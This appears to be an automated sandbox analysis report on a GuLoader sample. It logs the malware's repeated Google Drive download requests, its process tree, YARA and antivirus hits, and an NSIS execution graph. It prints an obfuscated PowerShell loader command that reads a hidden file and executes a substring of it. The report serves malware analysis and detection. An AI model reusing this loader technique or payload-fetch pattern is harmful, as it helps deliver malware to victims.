                                                                                              69 | 192.168.2.4 | 53790 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:49 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:49 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgT-s8RMq3mIctGA5_O297JTFPDTUVkRH8CipXL9ci6-o5iiV_2WfornzL9WHl1GcH4M8bqaVPI
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:49 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-A-lH-WkmLEHKA6lAxZAVEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zdppoYpei54khgmGraXMyA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              70 | 192.168.2.4 | 53791 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:50 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:50 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:50 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'nonce-DLcOHrMl_n1F7Q2wVL_eGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              71 | 192.168.2.4 | 53792 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:51 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:51 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7CoJK4ARR12QuzzmIwJdqRgxRlzbs6XxRMxU4IKj4i5KetpINl-WgXqQ0qML_G75Mddp1txTA
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:51 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-T7LT2ZQehJxj0mJvCe6Uhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uSBVXfJpx6NkTvrAVlp_OQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Target ID:0
                                                                                              Start time:21:51:46
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\LMSxhK1u8Z.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'048'752 bytes
                                                                                              MD5 hash:F2827F013A265DE94993C62BF9756B00
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:21:51:49
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)"
                                                                                              Imagebase:0xec0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2002927074.0000000009A85000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:21:51:49
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:21:52:18
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Calcifuge.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'048'752 bytes
                                                                                              MD5 hash:F2827F013A265DE94993C62BF9756B00
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2918084212.0000000001805000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 58%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                                Execution Graph

                                                                                                Execution Coverage:22.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:21.7%
                                                                                                Total number of Nodes:1267
                                                                                                Total number of Limit Nodes:30
405d68 18 API calls 2788->2789 2789->2787 2793 405060 SetWindowTextW 2790->2793 2794 40506d 2790->2794 2791->2786 2792 405051 lstrcatW 2791->2792 2792->2790 2793->2794 2794->2786 2795 405073 SendMessageW SendMessageW SendMessageW 2794->2795 2795->2786 2817 4060b0 GetModuleHandleA 2796->2817 2800 405c08 2800->2716 2802 40576f 2801->2802 2803 40609f FindClose 2801->2803 2802->2682 2802->2694 2803->2802 2805 405779 2804->2805 2806 4057ca lstrcatW 2804->2806 2805->2700 2806->2805 2807->2759 2809 405876 2808->2809 2812 405888 2808->2812 2811 405883 CharNextW 2809->2811 2809->2812 2810 4058ac 2810->2762 2810->2763 2811->2810 2812->2810 2813 4057db CharNextW 2812->2813 2813->2812 2815 405599 2814->2815 2816 4059bc SetFileAttributesW 2814->2816 2815->2780 2815->2781 2815->2782 2816->2815 2818 4060d7 GetProcAddress 2817->2818 2819 4060cc LoadLibraryA 2817->2819 2820 405be7 2818->2820 2819->2818 2819->2820 2820->2800 2821 405a52 lstrcpyW 2820->2821 2822 405aa1 GetShortPathNameW 2821->2822 2823 405a7b 2821->2823 2824 405ab6 2822->2824 2825 405bda 2822->2825 2845 4059cf GetFileAttributesW CreateFileW 2823->2845 2824->2825 2827 405abe wsprintfA 2824->2827 2825->2800 2829 405d68 18 API calls 2827->2829 2828 405a85 CloseHandle GetShortPathNameW 2828->2825 2830 405a99 2828->2830 2831 405ae6 2829->2831 2830->2822 2830->2825 2846 4059cf GetFileAttributesW CreateFileW 2831->2846 2833 405af3 2833->2825 2834 405b02 GetFileSize GlobalAlloc 2833->2834 2835 405bd3 CloseHandle 2834->2835 2836 405b24 ReadFile 2834->2836 2835->2825 2836->2835 2837 405b3c 2836->2837 2837->2835 2847 405934 lstrlenA 2837->2847 2840 405b55 lstrcpyA 2843 405b77 2840->2843 2841 405b69 2842 405934 4 API calls 2841->2842 2842->2843 2844 405bae SetFilePointer WriteFile GlobalFree 2843->2844 2844->2835 2845->2828 2846->2833 2848 405975 lstrlenA 2847->2848 2849 40594e lstrcmpiA 2848->2849 2851 40597d 2848->2851 2850 40596c CharNextA 2849->2850 2849->2851 2850->2848 2851->2840 2851->2841 3935 4040a9 lstrcpynW lstrlenW 
3936 401cab 3937 402ab3 18 API calls 3936->3937 3938 401cb2 3937->3938 3939 402ab3 18 API calls 3938->3939 3940 401cba GetDlgItem 3939->3940 3941 4024e6 3940->3941 3942 40232f 3943 402335 3942->3943 3944 402ad0 18 API calls 3943->3944 3945 402347 3944->3945 3946 402ad0 18 API calls 3945->3946 3947 402351 RegCreateKeyExW 3946->3947 3948 40237b 3947->3948 3949 402729 3947->3949 3950 402396 3948->3950 3951 402ad0 18 API calls 3948->3951 3952 4023a2 3950->3952 3954 402ab3 18 API calls 3950->3954 3953 40238c lstrlenW 3951->3953 3955 4023bd RegSetValueExW 3952->3955 3956 402f38 33 API calls 3952->3956 3953->3950 3954->3952 3957 4023d3 RegCloseKey 3955->3957 3956->3955 3957->3949 3959 4016af 3960 402ad0 18 API calls 3959->3960 3961 4016b5 GetFullPathNameW 3960->3961 3962 4016cf 3961->3962 3968 4016f1 3961->3968 3965 406089 2 API calls 3962->3965 3962->3968 3963 401706 GetShortPathNameW 3964 40295d 3963->3964 3966 4016e1 3965->3966 3966->3968 3969 405d46 lstrcpynW 3966->3969 3968->3963 3968->3964 3969->3968 3970 404430 3971 40445c 3970->3971 3972 40446d 3970->3972 4031 40550d GetDlgItemTextW 3971->4031 3974 404479 GetDlgItem 3972->3974 4007 4044d8 3972->4007 3976 40448d 3974->3976 3975 404467 3978 405fda 5 API calls 3975->3978 3980 4044a1 SetWindowTextW 3976->3980 3986 405859 4 API calls 3976->3986 3977 4045bc 3981 40475d 3977->3981 4033 40550d GetDlgItemTextW 3977->4033 3978->3972 3984 403f95 19 API calls 3980->3984 3985 403ffc 8 API calls 3981->3985 3982 405d68 18 API calls 3987 40454c SHBrowseForFolderW 3982->3987 3983 4045ec 3988 4058b6 18 API calls 3983->3988 3989 4044bd 3984->3989 3990 404771 3985->3990 3991 404497 3986->3991 3987->3977 3992 404564 CoTaskMemFree 3987->3992 3993 4045f2 3988->3993 3994 403f95 19 API calls 3989->3994 3991->3980 3997 4057ae 3 API calls 3991->3997 3995 4057ae 3 API calls 3992->3995 4034 405d46 lstrcpynW 3993->4034 3996 4044cb 3994->3996 3998 404571 3995->3998 4032 403fca SendMessageW 3996->4032 3997->3980 4001 4045a8 SetDlgItemTextW 
3998->4001 4006 405d68 18 API calls 3998->4006 4001->3977 4002 4044d1 4004 4060b0 3 API calls 4002->4004 4003 404609 4005 4060b0 3 API calls 4003->4005 4004->4007 4014 404611 4005->4014 4008 404590 lstrcmpiW 4006->4008 4007->3977 4007->3981 4007->3982 4008->4001 4011 4045a1 lstrcatW 4008->4011 4009 404650 4035 405d46 lstrcpynW 4009->4035 4011->4001 4012 404657 4013 405859 4 API calls 4012->4013 4015 40465d GetDiskFreeSpaceW 4013->4015 4014->4009 4017 4057fa 2 API calls 4014->4017 4019 4046a2 4014->4019 4018 404680 MulDiv 4015->4018 4015->4019 4017->4014 4018->4019 4020 40470c 4019->4020 4021 4047de 21 API calls 4019->4021 4022 40472f 4020->4022 4024 40140b 2 API calls 4020->4024 4023 4046fe 4021->4023 4036 403fb7 KiUserCallbackDispatcher 4022->4036 4026 404703 4023->4026 4027 40470e SetDlgItemTextW 4023->4027 4024->4022 4029 4047de 21 API calls 4026->4029 4027->4020 4028 40474b 4028->3981 4037 4043c5 4028->4037 4029->4020 4031->3975 4032->4002 4033->3983 4034->4003 4035->4012 4036->4028 4038 4043d3 4037->4038 4039 4043d8 SendMessageW 4037->4039 4038->4039 4039->3981 4040 404132 4041 40414a 4040->4041 4048 404264 4040->4048 4045 403f95 19 API calls 4041->4045 4042 4042ce 4043 4043a0 4042->4043 4044 4042d8 GetDlgItem 4042->4044 4050 403ffc 8 API calls 4043->4050 4046 404361 4044->4046 4047 4042f2 4044->4047 4049 4041b1 4045->4049 4046->4043 4055 404373 4046->4055 4047->4046 4054 404318 6 API calls 4047->4054 4048->4042 4048->4043 4051 40429f GetDlgItem SendMessageW 4048->4051 4053 403f95 19 API calls 4049->4053 4062 40439b 4050->4062 4071 403fb7 KiUserCallbackDispatcher 4051->4071 4057 4041be CheckDlgButton 4053->4057 4054->4046 4058 404389 4055->4058 4059 404379 SendMessageW 4055->4059 4056 4042c9 4060 4043c5 SendMessageW 4056->4060 4069 403fb7 KiUserCallbackDispatcher 4057->4069 4058->4062 4063 40438f SendMessageW 4058->4063 4059->4058 4060->4042 4063->4062 4064 4041dc GetDlgItem 4070 403fca SendMessageW 4064->4070 4066 4041f2 SendMessageW 4067 404218 SendMessageW 
SendMessageW lstrlenW SendMessageW SendMessageW 4066->4067 4068 40420f GetSysColor 4066->4068 4067->4062 4068->4067 4069->4064 4070->4066 4071->4056 4072 402938 SendMessageW 4073 402952 InvalidateRect 4072->4073 4074 40295d 4072->4074 4073->4074 4075 4014b8 4076 4014be 4075->4076 4077 401389 2 API calls 4076->4077 4078 4014c6 4077->4078 2976 4015b9 2977 402ad0 18 API calls 2976->2977 2978 4015c0 2977->2978 2979 405859 4 API calls 2978->2979 2986 4015c9 2979->2986 2980 401614 2981 401646 2980->2981 2982 401619 2980->2982 2989 401423 25 API calls 2981->2989 2994 401423 2982->2994 2983 4057db CharNextW 2984 4015d7 CreateDirectoryW 2983->2984 2984->2986 2987 4015ed GetLastError 2984->2987 2986->2980 2986->2983 2987->2986 2990 4015fa GetFileAttributesW 2987->2990 2993 40163e 2989->2993 2990->2986 2992 40162d SetCurrentDirectoryW 2992->2993 2995 404ffa 25 API calls 2994->2995 2996 401431 2995->2996 2997 405d46 lstrcpynW 2996->2997 2997->2992 2998 405139 2999 4052e5 2998->2999 3000 40515a GetDlgItem GetDlgItem GetDlgItem 2998->3000 3001 4052ee GetDlgItem CreateThread CloseHandle 2999->3001 3003 405316 2999->3003 3044 403fca SendMessageW 3000->3044 3001->3003 3067 4050cd OleInitialize 3001->3067 3005 405363 3003->3005 3006 40532d ShowWindow ShowWindow 3003->3006 3007 405341 3003->3007 3004 4051cb 3009 4051d2 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3004->3009 3053 403ffc 3005->3053 3049 403fca SendMessageW 3006->3049 3008 40539f 3007->3008 3011 405352 3007->3011 3012 405378 ShowWindow 3007->3012 3008->3005 3016 4053aa SendMessageW 3008->3016 3014 405241 3009->3014 3015 405225 SendMessageW SendMessageW 3009->3015 3050 403f6e 3011->3050 3019 405398 3012->3019 3020 40538a 3012->3020 3022 405254 3014->3022 3023 405246 SendMessageW 3014->3023 3015->3014 3018 405371 3016->3018 3024 4053c3 CreatePopupMenu 3016->3024 3021 403f6e SendMessageW 3019->3021 3025 404ffa 25 API calls 3020->3025 3021->3008 3045 403f95 3022->3045 3023->3022 3026 405d68 18 API calls 
3024->3026 3025->3019 3028 4053d3 AppendMenuW 3026->3028 3030 4053e6 GetWindowRect 3028->3030 3031 4053f9 3028->3031 3029 405264 3032 4052a1 GetDlgItem SendMessageW 3029->3032 3033 40526d ShowWindow 3029->3033 3034 405402 TrackPopupMenu 3030->3034 3031->3034 3032->3018 3037 4052c8 SendMessageW SendMessageW 3032->3037 3035 405290 3033->3035 3036 405283 ShowWindow 3033->3036 3034->3018 3038 405420 3034->3038 3048 403fca SendMessageW 3035->3048 3036->3035 3037->3018 3039 40543c SendMessageW 3038->3039 3039->3039 3041 405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3039->3041 3042 40547e SendMessageW 3041->3042 3042->3042 3043 4054a7 GlobalUnlock SetClipboardData CloseClipboard 3042->3043 3043->3018 3044->3004 3046 405d68 18 API calls 3045->3046 3047 403fa0 SetDlgItemTextW 3046->3047 3047->3029 3048->3032 3049->3007 3051 403f75 3050->3051 3052 403f7b SendMessageW 3050->3052 3051->3052 3052->3005 3054 40409d 3053->3054 3055 404014 GetWindowLongW 3053->3055 3054->3018 3055->3054 3056 404025 3055->3056 3057 404034 GetSysColor 3056->3057 3058 404037 3056->3058 3057->3058 3059 404047 SetBkMode 3058->3059 3060 40403d SetTextColor 3058->3060 3061 404065 3059->3061 3062 40405f GetSysColor 3059->3062 3060->3059 3063 404076 3061->3063 3064 40406c SetBkColor 3061->3064 3062->3061 3063->3054 3065 404090 CreateBrushIndirect 3063->3065 3066 404089 DeleteObject 3063->3066 3064->3063 3065->3054 3066->3065 3074 403fe1 3067->3074 3069 4050f0 3073 405117 3069->3073 3077 401389 3069->3077 3070 403fe1 SendMessageW 3071 405129 CoUninitialize 3070->3071 3073->3070 3075 403ff9 3074->3075 3076 403fea SendMessageW 3074->3076 3075->3069 3076->3075 3079 401390 3077->3079 3078 4013fe 3078->3069 3079->3078 3080 4013cb MulDiv SendMessageW 3079->3080 3080->3079 4079 401939 4080 402ad0 18 API calls 4079->4080 4081 401940 lstrlenW 4080->4081 4082 4024e6 4081->4082 4082->4082 3301 403abd 3302 403c10 3301->3302 3303 403ad5 3301->3303 3305 403c21 GetDlgItem GetDlgItem 3302->3305 3306 403c61 
3302->3306 3303->3302 3304 403ae1 3303->3304 3307 403aec SetWindowPos 3304->3307 3308 403aff 3304->3308 3309 403f95 19 API calls 3305->3309 3310 403cbb 3306->3310 3315 401389 2 API calls 3306->3315 3307->3308 3312 403b04 ShowWindow 3308->3312 3313 403b1c 3308->3313 3314 403c4b SetClassLongW 3309->3314 3311 403fe1 SendMessageW 3310->3311 3316 403c0b 3310->3316 3342 403ccd 3311->3342 3312->3313 3317 403b24 DestroyWindow 3313->3317 3318 403b3e 3313->3318 3319 40140b 2 API calls 3314->3319 3320 403c93 3315->3320 3321 403f1e 3317->3321 3322 403b43 SetWindowLongW 3318->3322 3323 403b54 3318->3323 3319->3306 3320->3310 3324 403c97 SendMessageW 3320->3324 3321->3316 3332 403f4f ShowWindow 3321->3332 3322->3316 3327 403b60 GetDlgItem 3323->3327 3328 403bfd 3323->3328 3324->3316 3325 40140b 2 API calls 3325->3342 3326 403f20 DestroyWindow EndDialog 3326->3321 3329 403b90 3327->3329 3330 403b73 SendMessageW IsWindowEnabled 3327->3330 3331 403ffc 8 API calls 3328->3331 3334 403b9d 3329->3334 3335 403be4 SendMessageW 3329->3335 3336 403bb0 3329->3336 3346 403b95 3329->3346 3330->3316 3330->3329 3331->3316 3332->3316 3333 405d68 18 API calls 3333->3342 3334->3335 3334->3346 3335->3328 3339 403bb8 3336->3339 3340 403bcd 3336->3340 3337 403f6e SendMessageW 3341 403bcb 3337->3341 3338 403f95 19 API calls 3338->3342 3344 40140b 2 API calls 3339->3344 3343 40140b 2 API calls 3340->3343 3341->3328 3342->3316 3342->3325 3342->3326 3342->3333 3342->3338 3347 403f95 19 API calls 3342->3347 3362 403e60 DestroyWindow 3342->3362 3345 403bd4 3343->3345 3344->3346 3345->3328 3345->3346 3346->3337 3348 403d48 GetDlgItem 3347->3348 3349 403d65 ShowWindow KiUserCallbackDispatcher 3348->3349 3350 403d5d 3348->3350 3371 403fb7 KiUserCallbackDispatcher 3349->3371 3350->3349 3352 403d8f EnableWindow 3355 403da3 3352->3355 3353 403da8 GetSystemMenu EnableMenuItem SendMessageW 3354 403dd8 SendMessageW 3353->3354 3353->3355 3354->3355 3355->3353 3372 403fca SendMessageW 3355->3372 3373 405d46 lstrcpynW 
3355->3373 3358 403e06 lstrlenW 3359 405d68 18 API calls 3358->3359 3360 403e1c SetWindowTextW 3359->3360 3361 401389 2 API calls 3360->3361 3361->3342 3362->3321 3363 403e7a CreateDialogParamW 3362->3363 3363->3321 3364 403ead 3363->3364 3365 403f95 19 API calls 3364->3365 3366 403eb8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3365->3366 3367 401389 2 API calls 3366->3367 3368 403efe 3367->3368 3368->3316 3369 403f06 ShowWindow 3368->3369 3370 403fe1 SendMessageW 3369->3370 3370->3321 3371->3352 3372->3355 3373->3358 3390 40173f 3391 402ad0 18 API calls 3390->3391 3392 401746 3391->3392 3393 4059fe 2 API calls 3392->3393 3394 40174d 3393->3394 3395 4059fe 2 API calls 3394->3395 3395->3394 4083 4026bf 4084 4026c6 4083->4084 4085 40295d 4083->4085 4086 4026cc FindClose 4084->4086 4086->4085

                                                                                                APIs
                                                                                                • #17.COMCTL32 ref: 004031FC
                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403207
                                                                                                • OleInitialize.OLE32(00000000), ref: 0040320E
                                                                                                  • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                                  • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                                  • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                                • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403236
                                                                                                  • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                                                • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 0040324B
                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",00000000), ref: 0040325E
                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",00000020), ref: 00403285
                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403389
                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339A
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A6
                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BA
